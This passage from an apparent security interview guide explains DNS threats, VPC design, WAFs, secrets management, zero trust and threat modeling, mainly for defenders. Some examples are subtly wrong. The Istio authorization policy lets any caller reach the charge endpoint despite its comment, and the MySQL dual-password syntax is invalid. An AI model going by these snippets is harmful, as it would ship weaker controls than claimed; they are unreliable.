SPIFFE (Secure Production Identity Framework For Everyone): Standard for workload identity. Each service gets a SPIFFE ID (URI like spiffe://cluster.local/ns/default/sa/my-service) encoded in an X.509 certificate (SVID). SPIRE is the reference implementation. Istio uses SPIFFE under the hood.

4What are DNS security risks? Explain DNS hijacking, cache poisoning, and DNSSEC.

DNS cache poisoning (Kaminsky attack): An attacker floods a DNS resolver with forged responses before the legitimate response arrives, poisoning its cache. Victims querying the resolver receive the attacker's IP for the targeted domain, redirecting traffic to a malicious server.

Mitigations: Source port randomization (makes guessing harder), DNSSEC validation, DNS-over-HTTPS (DoH) or DNS-over-TLS (DoT).

DNS hijacking: Compromising the authoritative DNS server or registrar account to change DNS records. Results in traffic being redirected at the source. BGP hijacking extends this to route-level redirection.

# DNSSEC — signs DNS records with cryptographic signatures
# Zone signs its records: A, MX, CNAME records get RRSIG (signature)
# Chain of trust from root zone → TLD (.com) → domain
# Resolvers verify signatures before accepting records

# Limitations of DNSSEC:
# Doesn't encrypt DNS queries (still visible to observers)
# Complex to configure — key management, zone signing
# Many resolvers don't validate DNSSEC

# DNS-over-HTTPS (DoH): wraps DNS in HTTPS (port 443)
# DNS-over-TLS (DoT): encrypts DNS over TLS (port 853)
# Both prevent eavesdropping of DNS queries
# DoH is harder to block (uses same port as HTTPS)

# Subdomain takeover:
# Service A's DNS: api.example.com CNAME → old-service.provider.com
# Old service is decommissioned — CNAME now dangling
# Attacker claims old-service.provider.com → controls api.example.com!
# Used to bypass same-origin policy, steal cookies
# Scan for dangling CNAMEs: dig api.example.com CNAME → check if target is claimed

5What is network segmentation and microsegmentation? How do you design secure VPC architecture?

# VPC design — defense in depth:
# Public subnet: only load balancers, NAT gateways, bastion hosts
# Private subnet (app tier): application servers — no direct internet access
# Private subnet (data tier): databases — no internet access, accessible only from app tier

# AWS Security Groups (stateful firewall per resource):
# Web tier SG: inbound 443 from 0.0.0.0/0, outbound to App SG only
# App tier SG: inbound 8080 from Web SG only, outbound to DB SG + NAT
# DB SG: inbound 5432 from App SG only, no outbound to internet

# Network ACLs (stateless firewall per subnet):
# Additional layer — both inbound and outbound rules needed
# Use to block known malicious IP ranges at subnet level

# Microsegmentation: apply security policies at individual workload level
# East-west traffic (between services within the network) is restricted
# Without: once attacker gains foothold on one service, can reach all others
# With: each service only accepts traffic from services that legitimately call it

# PrivateLink / private endpoints:
# Access AWS services (S3, DynamoDB) privately without internet/NAT
# Traffic stays within AWS backbone — no exposure to internet
# Required for compliance in many regulated industries

# VPN vs VPC peering vs PrivateLink:
# VPN: encrypt traffic over internet, for on-prem ↔ cloud
# VPC peering: private network between two VPCs (same or different accounts)
# PrivateLink: expose a service privately to another VPC without VPC peering
# Transit Gateway: hub-and-spoke for many VPCs

6What is a WAF (Web Application Firewall) and what are its limitations?

A WAF inspects HTTP traffic and blocks requests matching known attack patterns (SQLi, XSS, path traversal, etc.). It operates at Layer 7 and sits in front of your application — cloud (AWS WAF, Cloudflare), hardware (F5, Imperva), or software (ModSecurity).

# WAF capabilities:
# - Block OWASP Top 10 attack patterns (rule-based or ML-based)
# - Rate limiting / DDoS mitigation
# - Bot detection and management
# - Geo-blocking
# - Virtual patching (block exploits for known CVEs before you patch)

# AWS WAF example rules:
aws wafv2 create-web-acl \
  --rules '[
    {"Name": "AWSManagedRulesSQLiRuleSet", ...},
    {"Name": "AWSManagedRulesKnownBadInputsRuleSet", ...},
    {"Name": "RateLimitRule", "Action": {"Block": {}},
     "Statement": {"RateBasedStatement": {"Limit": 2000, "AggregateKeyType": "IP"}}}
  ]'

WAF limitations — a WAF is NOT a substitute for secure code:

Bypassable: Skilled attackers encode payloads to evade rule-based WAFs. Obfuscated SQL, Unicode escaping, chunked encoding — WAF rules are a cat-and-mouse game.
False positives: Blocking legitimate traffic, especially for complex apps or APIs.
No coverage for logic flaws: IDOR, authentication bypasses, business logic errors — WAF can't understand application semantics.
TLS termination required: WAF must decrypt to inspect — adds complexity and a new trust boundary.

WAF is defense in depth — one layer of many. Fix the vulnerability, use the WAF for additional coverage and quick response to zero-days.

7What is certificate transparency and how does it help detect certificate misissue?

Certificate Transparency (CT, RFC 6962) is a public audit system for TLS certificates. Every publicly-trusted certificate must be logged in a public append-only CT log before browsers will accept it.

# CT flow:
# 1. CA issues a certificate for api.example.com
# 2. CA submits the pre-certificate to one or more CT logs
# 3. CT log returns a Signed Certificate Timestamp (SCT)
# 4. CA embeds the SCT in the final certificate
# 5. Browser checks: certificate has valid SCT from a trusted log
# 6. If no SCT → browser rejects the certificate

# Why this matters:
# Without CT: a compromised or rogue CA can issue certs for your domain
#   and you'd only know when you discovered a MITM attack
# With CT: every cert for your domain is publicly visible within seconds of issuance
#   You can monitor and detect unauthorized certs automatically

# Monitoring your domain with CT:
# crt.sh — search all certs ever issued for a domain
# Facebook CT monitoring: subscribe to alerts for your domains
# certspotter.com — real-time monitoring
# Google's Certificate Transparency Policy: required since 2018

# Real example: Google caught Symantec mis-issuing certs in 2017 via CT logs
# Led to Symantec losing its CA status

# CAA records (DNS): restrict which CAs can issue certs for your domain
dig CAA example.com
# example.com. CAA 0 issue "letsencrypt.org"
# example.com. CAA 0 issuewild ";"  ← no wildcard certs allowed
# Browsers don't enforce CAA, but CAs must check before issuing

Secrets Management

7 questions

1What is secrets sprawl and how does a dedicated secrets manager solve it?

Secrets sprawl: Credentials scattered across config files, environment variables, CI logs, container images, source code, and Slack messages. When one location is compromised or needs rotation, you don't know all the places to update.

What a secrets manager provides:

Centralized storage: All secrets in one auditable place
Access control: Fine-grained ACLs — service A can only read database password X, not API key Y
Audit log: Who accessed which secret and when — critical for compliance and incident response
Automatic rotation: Generate new credentials on a schedule, update all dependent services
Encryption at rest and in transit: Secrets encrypted with hardware-protected keys (HSM)
Dynamic secrets: Generate short-lived credentials on demand (e.g., Vault issues a DB credential valid for 1 hour)

# HashiCorp Vault — dynamic DB credentials:
vault write database/creds/my-role
# Returns: username=v-app-AbC123, password=rAnD0m, lease_duration=1h
# Credentials auto-revoked after 1h
# If a service is compromised, its credentials expire without manual rotation

# AWS Secrets Manager — automatic rotation:
aws secretsmanager create-secret --name db/prod/password --secret-string "oldpassword"
aws secretsmanager rotate-secret --secret-id db/prod/password
#  --rotation-lambda-arn arn:aws:lambda:... --rotation-rules '{"AutomaticallyAfterDays": 30}'

# Application retrieval:
import boto3
client = boto3.client('secretsmanager')
secret = client.get_secret_value(SecretId='db/prod/password')['SecretString']

2How do you handle secrets in Kubernetes? Compare Kubernetes Secrets, Sealed Secrets, and external secret operators.

# Kubernetes Secrets — base64 encoded, NOT encrypted by default!
apiVersion: v1
kind: Secret
metadata: { name: db-secret }
type: Opaque
data:
  password: cGFzc3dvcmQ=   # base64("password") — anyone with kubectl access reads this

# Enable encryption at rest (etcd-level):
# kube-apiserver --encryption-provider-config=/etc/kubernetes/encryption.yaml
# Encrypts secrets in etcd using AES-GCM or KMS (AWS, GCP, Azure)
# Still readable by anyone with kubectl get secret — only protects etcd disk

# Sealed Secrets (Bitnami):
# Asymmetric encryption — SealedSecret can only be decrypted by the cluster controller
# Safe to commit to git! SealedSecret → kubernetes.io/v1.Secret only in cluster
kubeseal --cert pub-cert.pem < secret.yaml > sealed-secret.yaml  # encrypt
# git commit sealed-secret.yaml  ← safe to commit
# kubectl apply -f sealed-secret.yaml  → controller creates the real Secret

# External Secrets Operator (ESO) — recommended approach:
# Syncs secrets from external stores (AWS SM, Vault, GCP SM) into K8s Secrets
# Secret lives in the external store (rotatable, auditable)
# ESO creates/updates K8s Secret automatically
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
spec:
  secretStoreRef: { name: aws-secretsmanager, kind: SecretStore }
  target: { name: db-secret }
  data:
  - secretKey: password
    remoteRef: { key: db/prod, property: password }

# Workload identity (no secrets at all — best approach):
# Pod gets AWS IAM role via IRSA (IAM Roles for Service Accounts)
# Pod calls AWS APIs using temporary credentials — no secret to manage
# GKE Workload Identity, Azure Workload Identity work the same way

3How do you prevent secrets from leaking in CI/CD pipelines and git history?

# Prevention tools:
# 1. pre-commit hooks — scan before commit
pip install detect-secrets
detect-secrets scan > .secrets.baseline
# Add to .pre-commit-config.yaml:
# - repo: https://github.com/Yelp/detect-secrets
#   hooks: [{id: detect-secrets, args: [--baseline, .secrets.baseline]}]

# 2. git-secrets (AWS Labs) — prevents AWS keys from being committed
git secrets --install
git secrets --register-aws

# 3. truffleHog / gitleaks — scan git history for secrets
gitleaks detect --source . --verbose
trufflehog git file://. --only-verified  # only report confirmed live credentials

# 4. GitHub Advanced Security / GitLab Secret Detection — built-in scanning

# If a secret was committed:
# 1. Revoke the credential IMMEDIATELY — assume it was seen
# 2. Remove from git history (but this doesn't help if already public):
git filter-repo --path secrets.env --invert-paths  # remove file from all history
# Or BFG Repo-Cleaner: bfg --delete-files secrets.env
# 3. Force push all branches (coordinate with team)
# 4. Change all downstream consumers

# CI/CD best practices:
# - Never print env vars in CI logs: set +x in bash before using secrets
# - Mask secrets in CI output (GitHub Actions, GitLab CI do this automatically)
# - Use OIDC federation for CI → cloud access (no stored cloud credentials!)
# GitHub Actions → AWS:
# permissions: id-token: write  # get OIDC token
# aws-actions/configure-aws-credentials with role-to-assume
# No AWS_ACCESS_KEY_ID in GitHub Secrets needed

4What is envelope encryption and how do cloud KMS systems implement it?

Encrypting large amounts of data directly with a KMS key would be slow and expensive (KMS API calls per operation). Envelope encryption uses a local data encryption key (DEK) for the actual data and wraps (encrypts) the DEK with the KMS key.

# Envelope encryption pattern:
# 1. Generate a random DEK (Data Encryption Key) locally
# 2. Encrypt your data with the DEK (AES-256-GCM — fast, local operation)
# 3. Encrypt the DEK with the KMS CMK (Customer Master Key) — one API call
# 4. Store: encrypted_data + encrypted_DEK together
# 5. Decrypt: call KMS to decrypt DEK → use DEK to decrypt data

import boto3
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

kms = boto3.client('kms')
KEY_ID = 'arn:aws:kms:us-east-1:123456789:key/abc123'

def encrypt(plaintext: bytes) -> dict:
    # Generate a random 256-bit DEK
    dek = os.urandom(32)
    nonce = os.urandom(12)

    # Encrypt data locally with DEK
    encrypted_data = AESGCM(dek).encrypt(nonce, plaintext, None)

    # Wrap DEK with KMS (one API call)
    response = kms.encrypt(KeyId=KEY_ID, Plaintext=dek)
    encrypted_dek = response['CiphertextBlob']

    return {'data': nonce + encrypted_data, 'dek': encrypted_dek}

def decrypt(envelope: dict) -> bytes:
    # Unwrap DEK via KMS
    response = kms.decrypt(CiphertextBlob=envelope['dek'])
    dek = response['Plaintext']

    # Decrypt data locally
    nonce, ciphertext = envelope['data'][:12], envelope['data'][12:]
    return AESGCM(dek).decrypt(nonce, ciphertext, None)

# Benefits:
# KMS key never leaves the HSM — only DEK is transmitted to application
# Bulk data encrypted locally — fast, no KMS API rate limits
# Key rotation: re-encrypt the DEK with a new KMS key (not re-encrypt all data)

5How do you implement secret rotation without downtime? What is the dual-secret pattern?

# Secret rotation challenge:
# If you change a DB password and not all services reload simultaneously → outage

# Pattern 1: Dual-credential rotation (AWS recommended):
# Phase 1: Create new credentials alongside old ones (DB user has two passwords)
# Phase 2: Update all consumers to use new credentials (rolling deploy)
# Phase 3: Revoke old credentials

# Phase 1: DB allows both old and new password
ALTER USER app_user ADD PASSWORD 'new_password';  # MySQL supports multiple auth plugins

# Phase 2: Deploy new application config with new password
# Phase 3: After all instances updated:
ALTER USER app_user DROP PASSWORD 'old_password';

# Pattern 2: Connection pool with credential refresh
class RotatingConnectionPool:
    def __init__(self):
        self._secret_version = None
        self._pool = None

    def get_connection(self):
        current_version = secrets_manager.get_version("db/password")
        if current_version != self._secret_version:
            self._pool = create_new_pool(secrets_manager.get("db/password"))
            self._secret_version = current_version
        return self._pool.get_connection()

# Pattern 3: Short-lived dynamic credentials (Vault lease model)
# Vault generates unique credentials per service instance with 1-hour TTL
# Rotation = let old credentials expire naturally
# No coordination needed across services

# Rotation triggers:
# Scheduled: every 30/90 days
# Reactive: on suspected compromise, employee offboarding, service decommission
# Event-driven: after a security scan detects public exposure

6How do you securely pass secrets to containers and serverless functions?

# Anti-patterns (avoid):
# 1. Baking secrets into container images
#    docker history myapp:latest shows ENV commands!
#    Leaked in image layers, registries, scanning tools

# 2. Secrets as environment variables set at build time
#    Visible in docker inspect, process list (/proc/env), CI logs

# Recommended approaches:

# 1. Secrets manager SDK at runtime (best for sensitive secrets):
import boto3
def get_db_password():
    client = boto3.client('secretsmanager')
    return client.get_secret_value(SecretId='db/prod')['SecretString']
# Requires container to have IAM role (ECS task role, K8s IRSA)
# Secret never stored in the container image or env vars

# 2. Volume-mounted secrets (Kubernetes, Docker Swarm):
# K8s ExternalSecret → K8s Secret → mounted as file at /run/secrets/db-password
# tmpfs mount: secret in memory only, not written to disk
volumes:
- name: db-secret
  secret: { secretName: db-secret }
containers:
- volumeMounts:
  - name: db-secret
    mountPath: /run/secrets
    readOnly: true

# 3. Init container / sidecar (Vault Agent Injector):
# Vault sidecar authenticates and writes secrets to shared volume before main container starts
# Main container reads secrets from /vault/secrets/ — no Vault SDK needed

# AWS Lambda:
# Option A: Lambda environment variable + encryption via KMS (automatic)
# Option B: SSM Parameter Store at cold start:
import boto3, os
ssm = boto3.client('ssm')
DB_PASS = ssm.get_parameter(Name='/prod/db/password', WithDecryption=True)['Parameter']['Value']

# Serverless Framework:
provider:
  environment:
    DB_PASSWORD: ${ssm:/prod/db/password~true}  # resolved at deploy, still in env

7What is workload identity and how do OIDC federation patterns eliminate static credentials?

Workload identity assigns a cryptographic identity to a service or workload and allows it to authenticate to cloud services without static credentials (no API keys, no long-lived secrets).

# GitHub Actions → AWS (OIDC federation):
# 1. GitHub acts as an OIDC IdP, issues signed JWT to each workflow run
# 2. AWS IAM has a trust policy that accepts GitHub's JWTs
# 3. Workflow exchanges JWT for temporary AWS credentials via STS
# 4. No AWS_ACCESS_KEY_ID needed in GitHub Secrets!

# GitHub Actions workflow:
permissions:
  id-token: write    # allow requesting OIDC token
  contents: read

steps:
  - uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: arn:aws:iam::123456789:role/GitHubActionsRole
      aws-region: us-east-1
      # ← no access keys needed, uses OIDC token

# IAM trust policy:
{
  "Principal": {"Federated": "arn:aws:iam::123:oidc-provider/token.actions.githubusercontent.com"},
  "Action": "sts:AssumeRoleWithWebIdentity",
  "Condition": {
    "StringLike": {
      "token.actions.githubusercontent.com:sub": "repo:myorg/myrepo:ref:refs/heads/main"
    }
  }
}

# Kubernetes → AWS (IRSA — IAM Roles for Service Accounts):
# Each pod's service account gets an OIDC token
# Pod can assume an IAM role via STS without any stored credentials
# EKS cluster acts as OIDC provider

# GKE Workload Identity: same concept, GKE SA ↔ GCP SA binding
# Azure Workload Identity: K8s SA ↔ Azure Managed Identity

Zero-Trust Architecture

6 questions

1What is zero-trust security? How does it differ from the traditional perimeter model?

Traditional perimeter model ("castle and moat"): Trust everyone inside the network, distrust everyone outside. VPN grants full internal network access. Once inside, lateral movement is easy. Failures: breach one endpoint → access everything; remote work/cloud punches holes in the perimeter.

Zero-trust model: "Never trust, always verify." Every request is authenticated, authorized, and inspected regardless of where it originates — internal or external. The network location grants zero implicit trust.

Zero-trust principles (NIST SP 800-207):

All data sources and computing services are resources — no "trusted network"
All communication is secured regardless of network location
Access to individual resources is granted per-session, not per-network
Access is determined by dynamic policy (identity + device posture + context)
All authentication and authorization is logged and audited

Key technologies enabling zero-trust:

Identity (IdP): Strong authentication, MFA, continuous re-verification
Device trust: Device posture assessment (is it patched? enrolled? compliant?)
Microsegmentation: Network access restricted to specific service-to-service paths
mTLS: Service-to-service authentication in the service mesh
Least privilege: JIT access, short-lived credentials

2What is BeyondCorp and how did Google pioneer zero-trust for remote access?

Google's BeyondCorp (2014 paper) eliminated the corporate VPN entirely. Every application is accessible from any network — internet access is the same as "corporate" access. Access decisions are based on user identity + device trust, not network location.

BeyondCorp components:

Device inventory: All managed devices are enrolled, tracked, and given a certificate. Device posture (OS version, patch status, MDM enrollment) is assessed continuously.
Access proxy: All requests go through a central proxy that enforces policy. No direct access to backend services from the internet.
Trust engine: Combines user identity (strong auth, MFA) + device trust level → access decision. A fully patched managed device gets more access than a personal unmanaged device.

# Access control logic:
def should_grant_access(user, device, resource, context):
    user_trust  = identity_provider.get_trust_level(user)   # high/medium/low
    device_trust = device_inventory.get_trust_level(device)  # managed/unmanaged

    policy = access_policies.get(resource)
    return (user_trust  >= policy.required_user_trust and
            device_trust >= policy.required_device_trust and
            context.location in policy.allowed_locations)

# Commercial products implementing BeyondCorp model:
# Google BeyondCorp Enterprise, Cloudflare Access, Zscaler Private Access,
# Palo Alto Prisma Access, Cisco Zero Trust

Modern implementation: Cloudflare Access / Zero Trust is widely adopted. DNS-filtered tunnel replaces VPN. Every app gets its own access policy. SSO + MFA on every app. Audit log of every access attempt. No VPN client needed.

3How do you implement zero-trust for microservices? Explain service mesh and policy engines.

# Service mesh (Istio) — zero-trust for microservices:
# Inject a sidecar proxy (Envoy) into every pod
# Proxies handle mTLS, authorization, and observability transparently

# Istio PeerAuthentication — enforce mTLS:
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata: { name: default, namespace: production }
spec:
  mtls:
    mode: STRICT   # reject any non-mTLS connection

# Istio AuthorizationPolicy — service-level firewall:
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata: { name: payments-authz, namespace: production }
spec:
  selector:
    matchLabels: { app: payment-service }
  rules:
  - from:
    - source:
        principals: ["cluster.local/ns/production/sa/order-service"]  # only order-service
  - to:
    - operation:
        methods: ["POST"]
        paths: ["/api/v1/charge"]   # only this endpoint

# Open Policy Agent (OPA) — policy as code:
# Define authorization rules in Rego language
package authz
default allow = false
allow {
    input.method == "GET"
    user_role[input.user] == "viewer"
}
allow {
    user_role[input.user] == "admin"
}

# OPA as K8s admission controller (Gatekeeper):
# Evaluate policies on every resource creation/modification
# Prevent misconfigured pods, enforce security baselines

4What is privileged access management (PAM)? How do you secure privileged accounts?

Privileged accounts (root, admin, service accounts with broad permissions) are the primary target of attackers. PAM (Privileged Access Management) controls, monitors, and audits privileged access.

Core PAM controls:

No shared admin accounts: Every person has their own identity for privileged access — accountability and auditability
Just-in-time (JIT) access: Elevated privileges granted for a specific task, for a bounded time, then revoked automatically
Session recording: All privileged sessions recorded for audit and forensics
Credential vaulting: Privileged passwords checked out from a vault, rotated automatically after use
Break-glass procedures: Emergency access with automatic alerting when used

# JIT access with HashiCorp Boundary:
boundary connect ssh -target-id ttcp_123 -username alice
# Boundary creates an ephemeral SSH credential, connects alice
# Session is recorded, time-limited, revoked when done

# AWS SSO / Identity Center JIT:
# Request temporary elevated role via approval workflow
# 4-hour access window, all API calls logged to CloudTrail

# Bastion host (older approach) vs Zero-Trust:
# Bastion: single jump host, SSH/RDP through it → still persistent access
# Zero-Trust PAM: no persistent access, every session is ephemeral and audited

# Root account protection (AWS):
# Use root ONLY for tasks that require it (very few)
# Enforce hardware MFA on root
# Remove root access keys entirely
# Monitor with CloudWatch Events for any root account usage

5How do you implement continuous authentication and step-up auth for sensitive operations?

# Step-up authentication: require stronger auth for sensitive operations
# Even with an active session, re-verify before high-risk actions

# Implementation:
from datetime import datetime, timedelta

def require_step_up_auth(user, action):
    """Require re-authentication for sensitive operations."""
    last_strong_auth = session.get("last_strong_auth")
    if not last_strong_auth or datetime.now() - last_strong_auth > timedelta(minutes=15):
        # Redirect to step-up auth endpoint
        return redirect(f"/auth/step-up?next={request.url}&action={action}")
    return None  # auth is fresh enough

@app.route("/api/transfer", methods=["POST"])
def transfer_funds():
    redirect = require_step_up_auth(current_user, "financial_transfer")
    if redirect: return redirect
    # Proceed with transfer

# Continuous authentication signals:
# Network location change → re-authenticate
# Device fingerprint change → re-authenticate
# Behavioral anomaly (typing pattern, mouse movement) → flag for review
# Off-hours access to sensitive resources → alert + step-up

# Adaptive authentication (risk-based):
def calculate_risk_score(request, user):
    score = 0
    if request.ip not in user.known_ips: score += 30
    if request.country != user.usual_country: score += 40
    if request.time.hour not in user.usual_hours: score += 20
    if user.recent_failed_logins > 3: score += 25
    return score  # 0-100

def get_required_auth_level(risk_score):
    if risk_score < 30: return "password"
    if risk_score < 60: return "mfa_soft"
    return "mfa_hardware"

6What is SIEM and how do you design effective security monitoring and alerting?

SIEM (Security Information and Event Management) aggregates, correlates, and analyzes security events across your infrastructure to detect threats and support incident response.

# What to log (at minimum):
# Authentication: all login attempts (success/failure), source IP, MFA outcome
# Authorization: all access denials, privilege escalations
# Data access: reads/writes to sensitive data (PII, financial, health)
# Configuration changes: IAM policy changes, security group changes, secret access
# Network: anomalous traffic patterns, DNS queries, outbound connections to new IPs

# Structured logging format (JSON):
{
  "timestamp": "2024-01-15T10:30:00Z",
  "event_type": "auth.login.failure",
  "user_id": "user_123",
  "source_ip": "203.0.113.5",
  "user_agent": "Mozilla/5.0...",
  "failure_reason": "invalid_password",
  "attempt_number": 3,
  "trace_id": "abc-123"
}

# Critical alerts (page on-call immediately):
# - Root account usage
# - IAM policy changes
# - Multiple failed logins followed by success (brute force)
# - Access from impossible travel (London → Tokyo in 2 hours)
# - Large data exfiltration (unusual data volume)
# - Secrets access outside normal patterns
# - Container escape or privilege escalation

# Alert fatigue prevention:
# High-fidelity alerts only — tune out noise before going to production
# Severity tiers: P1 (immediate page) / P2 (notify in 30 min) / P3 (review daily)
# Automated response for known patterns (auto-revoke compromised tokens)

# Tools: Splunk, Elastic SIEM, AWS Security Hub + GuardDuty, Datadog Security Monitoring

Threat Modeling

5 questions

1What is threat modeling and what are the STRIDE and PASTA frameworks?

Threat modeling is a structured process for identifying security threats to a system during design, before code is written. Finding and fixing design flaws costs 100× less than fixing them in production.

Four key questions (Adam Shostack):

What are we building? (system diagram)
What can go wrong? (threats)
What are we going to do about it? (mitigations)
Did we do a good enough job? (validation)

STRIDE (Microsoft): A mnemonic for threat categories applied to each element of a DFD (Data Flow Diagram):

Spoofing identity — pretending to be someone else → Authentication controls
Tampering with data — modifying data in transit or at rest → Integrity controls (MAC, signing)
Repudiation — denying an action was taken → Non-repudiation (audit logs, signatures)
Information disclosure — exposing data to unauthorized parties → Encryption, access control
Denial of service — making service unavailable → Rate limiting, redundancy
Elevation of privilege — gaining more access than allowed → Authorization controls, least privilege

PASTA (Process for Attack Simulation and Threat Analysis): Risk-centric, 7-stage methodology that aligns threats to business objectives. More comprehensive but complex. Used when you need to quantify risk and prioritize based on business impact.

2How do you create a Data Flow Diagram (DFD) for threat modeling? What are trust boundaries?

A Data Flow Diagram (DFD) maps the system's components and how data flows between them. It's the foundation of STRIDE threat modeling — you apply STRIDE to each element and each data flow.

DFD elements:

External entities: Users, external systems, third parties (rectangles) — outside your control
Processes: Components that transform data (circles/rounded rectangles) — your code
Data stores: Databases, caches, files (parallel lines) — where data rests
Data flows: Arrows showing how data moves between elements
Trust boundaries: Dashed lines separating zones of different trust levels

# Trust boundaries — where threats are highest:
# Every data flow that CROSSES a trust boundary needs scrutiny:
# Internet → Load Balancer:  boundary between internet and DMZ
# DMZ → App Server:          boundary between DMZ and internal network
# App Server → Database:     boundary between app tier and data tier
# App Server → External API: boundary between your system and third party
# Container → Host:          container boundary (escape risks)
# Browser → Backend:         user trust to server trust

# For each trust boundary crossing, ask:
# STRIDE questions for each data flow across the boundary
# - Can the sender spoof their identity? (Spoofing)
# - Can the data be modified in transit? (Tampering)
# - Does the receiver log this for accountability? (Repudiation)
# - Could this expose sensitive data? (Info Disclosure)
# - Could this be used to overwhelm the receiver? (DoS)
# - Could this allow the sender to gain more privileges? (Elevation)

3How do you prioritize threats? Explain DREAD and the risk matrix approach.

After identifying threats, you must prioritize them — you can't fix everything at once. Risk = Likelihood × Impact.

DREAD scoring (each factor 1-10):

Damage — how much damage if exploited? (data loss, financial, reputational)
Reproducibility — how easily can the attack be reproduced?
Exploitability — how much skill/effort does exploitation require?
Affected users — how many users are impacted?
Discoverability — how easy is it to find the vulnerability?

# Risk matrix (simpler, preferred by many teams):
# Likelihood: High (likely within 1 year), Medium (possible), Low (unlikely)
# Impact: Critical (system compromise/major data breach), High, Medium, Low

# Priority matrix:
#            | Low Impact | Medium | High | Critical |
# High Likel.|   Medium   |  High  | High |  P0 Fix! |
# Med Likel. |    Low     | Medium | High |   High   |
# Low Likel. |    Low     |  Low   |Medium|   High   |

def prioritize_threat(likelihood, impact):
    matrix = {
        ("high", "critical"): "P0_immediate",
        ("high", "high"): "P1_sprint",
        ("medium", "critical"): "P1_sprint",
        ("high", "medium"): "P2_backlog",
        ("medium", "high"): "P2_backlog",
        ("low", "critical"): "P2_backlog",
    }
    return matrix.get((likelihood, impact), "P3_monitor")

# Output: mitigation plan for each threat
# - Accept: risk is low, cost of mitigation exceeds benefit
# - Transfer: cyber insurance, SLA with third party
# - Mitigate: implement a control
# - Eliminate: remove the feature/component that introduces the risk

4How do you conduct a threat model for a new API? Walk through a practical example.

# Example: payment processing API
# Step 1: What are we building?
# DFD: Mobile App → API Gateway → Payment Service → Stripe API
# ↓
# PostgreSQL (orders, payment_tokens)
# Trust boundaries: Internet/DMZ, DMZ/Internal, Internal/External API

# Step 2: What can go wrong? (STRIDE per element)

# Data flow: Mobile App → API Gateway
# S: Can attacker spoof a legitimate user? → need strong auth (OAuth + MFA)
# T: Can they tamper with payment amount? → TLS + request signing + server-side validation
# R: Can user deny making a payment? → immutable audit log + signed receipts
# I: Does mobile app expose card data? → tokenize at source (never see raw PAN)
# D: DDoS on payment endpoint? → rate limiting per user, WAF, CDN
# E: Can user charge another user's card? → strict IDOR protection on payment methods

# Data store: PostgreSQL
# S: Can attacker pose as the payment service? → mTLS, DB credentials not shared
# T: Can DB data be modified without authorization? → DB user has minimal privileges
# I: Payment tokens exposed in breach? → tokens not PAN, still encrypt at rest
# E: Can app service access other customers' data? → row-level security, ORM filters

# Step 3: Mitigations
# - Implement: OAuth 2.0 + PKCE, mTLS for internal services, encrypted at-rest DB
# - Stripe tokenization handles PAN compliance
# - Audit log every payment event (immutable, append-only)
# - Rate limiting: 3 failed payment attempts → lock for 1 hour
# - Add to backlog: fraud detection ML model, velocity checks

5What is an attack tree and how do you use it to analyze complex attack chains?

An attack tree is a hierarchical diagram that represents the ways an attacker can achieve a goal (the root). AND nodes require all children to succeed; OR nodes require any one child. It helps identify the cheapest, most feasible attack path.

# Attack tree: "Steal customer PII"
#
# ROOT: Access customer PII database
#   OR:
#   ├── SQL Injection on web app
#   │     AND: web app has SQLi vulnerability
#   │     AND: DB user has SELECT on PII table (← defense: least privilege breaks AND)
#   │
#   ├── Compromise admin credentials
#   │     OR:
#   │     ├── Phishing attack on admin
#   │     │     AND: admin clicks malicious link
#   │     │     AND: no MFA (← defense: MFA breaks AND)
#   │     └── Credential stuffing
#   │           AND: admin reuses password from breach
#   │           AND: no MFA (← same defense breaks multiple paths)
#   │
#   └── SSRF via file upload feature
#         AND: upload service fetches user-provided URLs
#         AND: internal DB accessible from upload service (← network segmentation)

# Analysis: MFA on admin accounts breaks two separate attack paths
# Conclusion: implement MFA first — highest ROI defensive control

# Using attack trees for red team exercises:
# Build the tree for each crown-jewel asset
# Score each leaf: cost to attacker, likelihood
# Find cheapest complete path → that's your red team scenario
# Implement controls that cut the most paths, not the most expensive ones

Secure Development

7 questions

1What is a Secure Development Lifecycle (SDL)? How do you shift security left?

SDL integrates security into every phase of software development rather than bolting it on at the end. "Shift left" means finding security issues earlier in the development cycle — when they're cheapest to fix.

Cost of fixing at different stages: Design ($1) → Development ($6) → Testing ($15) → Production ($300+). Finding a vulnerability in production after a breach can cost millions.

SDL phases:

Requirements: Security requirements alongside functional ones. Abuse cases (what can a malicious user do?). Regulatory compliance requirements (GDPR, PCI-DSS).
Design: Threat modeling. Architecture review. Data classification. Privacy by design.
Development: Secure coding standards. IDE plugins (SonarLint, CodeWhisperer security). Pre-commit hooks (secret scanning, SAST).
Testing: SAST (static analysis), DAST (dynamic scanning), SCA (dependency CVEs), penetration testing.
Deployment: Infrastructure-as-code security scanning (tfsec, Checkov). Container image scanning. Immutable deployments.
Operations: Runtime security monitoring. Vulnerability management. Incident response.

# Security in CI/CD pipeline:
# Every commit/PR:
#   → SAST: semgrep, CodeQL, SonarQube
#   → Secret scanning: gitleaks, detect-secrets
#   → Dependency audit: npm audit, pip audit, snyk
#   → Container scan: trivy, grype
# Weekly:
#   → DAST on staging: OWASP ZAP, Burp Suite Enterprise
# Quarterly:
#   → Penetration test by external security firm

2What is SAST vs DAST vs SCA? How do they complement each other?

SAST (Static Application Security Testing): Analyzes source code without executing it. Fast, runs in CI, no running application needed. Finds: SQLi patterns, hardcoded secrets, unsafe deserialization, buffer overflows. High false positive rate — needs tuning. Tools: Semgrep, CodeQL, Checkmarx, Veracode, SonarQube.

DAST (Dynamic Application Security Testing): Tests the running application from the outside, simulating an attacker. Finds: auth bypasses, XSS, SQLi that SAST missed, business logic flaws, misconfigurations. Requires a running environment. Tools: OWASP ZAP, Burp Suite, Nuclei.

SCA (Software Composition Analysis): Analyzes open-source dependencies for known CVEs. Finds: Log4Shell in your dependency tree, outdated packages with patches available. Low false positive rate — CVE databases are reliable. Tools: Snyk, Dependabot, npm audit, OWASP Dependency-Check.

# They cover different attack surfaces:
# SAST:  your code → finds logic errors and insecure patterns
# DAST:  running app → finds runtime vulnerabilities and misconfigs
# SCA:   your dependencies → finds known CVEs in third-party code

# In practice:
# SAST + secret scanning: every PR in CI (fast feedback, developer fix it now)
# SCA: every PR + daily scheduled scan (CVEs announced daily)
# DAST: nightly on staging environment (slower, needs running app)
# Manual pentest: quarterly by external firm (context, creativity, chaining vulnerabilities)

# Prioritizing SAST findings:
# Severity: critical/high first
